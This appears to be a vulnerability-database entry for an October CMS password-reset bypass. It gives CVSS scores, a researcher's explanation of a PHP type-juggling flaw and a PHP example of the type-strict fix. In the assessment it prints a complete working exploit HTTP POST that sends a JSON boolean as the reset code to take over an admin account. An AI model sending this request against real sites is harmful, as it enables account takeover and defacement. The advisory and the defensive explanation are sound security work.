CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
89.6%
octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
Recent assessments:
kevthehermit at January 14, 2022 5:01pm UTC reported:
This is a simple Type Confusion / Juggling vulnerability.
October CMS will check to see if the user-supplied reset code matches the value in the database: return ($this->reset_password_code == $resetCode);
If we can send a boolean value in place of a reset code we can bypass this check.
Laravel has a feature that if an HTTP POST request is sent as JSON then it will be converted to a matching form data set; however, the types will persist.
To exploit this vulnerability we simply need to set the Content-Type to JSON and structure our POST request accordingly. An example POST is shown below.
POST /backend/backend/auth/reset/1/[] HTTP/1.1
Host: 172.17.0.2
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.0.2
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.2/backend/backend/auth/reset/1/a
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9
Connection: close
{"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites: <https://twitter.com/KimZetter/status/1481890639029551106>
A proof of concept python script that will attempt to reset the password for the admin account has been published: <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>
An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.
Applying the patches will successfully mitigate against this attack.
Assessed Attacker Value: 2
Assessed Attacker Value: 5
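The juggling described in the assessment above, as an added example that is not October CMS or Laravel code. It contrasts the loose comparison pattern quoted there with a type-strict, constant-time check, and feeds both a form-style string and a JSON boolean so the difference is visible. The stored code, the function names and the sample request bodies are constructed for illustration.

```php
<?php
// Added example, not October CMS code. Shows why a loose (==) comparison
// of a reset code stored as a string is satisfied by a JSON boolean, and
// what a type-strict check looks like instead.

// Hypothetical stored value standing in for $this->reset_password_code.
$storedCode = 'f3a9c2e1d5b7480aa1c3e5f7d9b1c2e4';

// Mirrors the pattern quoted in the assessment: loose comparison.
// In PHP 8 a string compared with a bool is still converted to bool,
// so any non-empty stored code == true.
function checkResetCodeLoose(string $storedCode, $userCode): bool
{
    return $storedCode == $userCode;
}

// Hardened: refuse anything that is not a non-empty string, then
// compare in constant time with hash_equals().
function checkResetCodeStrict(string $storedCode, $userCode): bool
{
    if (!is_string($userCode) || $userCode === '') {
        return false;
    }
    return hash_equals($storedCode, $userCode);
}

// Constructed request bodies. A form-encoded body always yields strings;
// a JSON body preserves scalar types, so "code": true arrives as bool(true).
$bodies = [
    'form'  => ['code' => 'true'],                      // string "true"
    'json'  => json_decode('{"code": true}', true),    // bool(true)
    'wrong' => ['code' => '0000'],                      // wrong string
    'right' => ['code' => $storedCode],                 // correct string
];

foreach ($bodies as $label => $body) {
    printf(
        "%-5s loose=%-5s strict=%s\n",
        $label,
        var_export(checkResetCodeLoose($storedCode, $body['code']), true),
        var_export(checkResetCodeStrict($storedCode, $body['code']), true)
    );
}
```

Run with `php example.php`. Only the `json` row passes the loose check without knowing the code; the strict check accepts only the `right` row. The `is_string()` guard is the part that matters here, since Laravel's JSON request parsing hands the controller the decoded PHP type rather than a string, and `hash_equals()` additionally removes the timing side channel a plain `===` would leave.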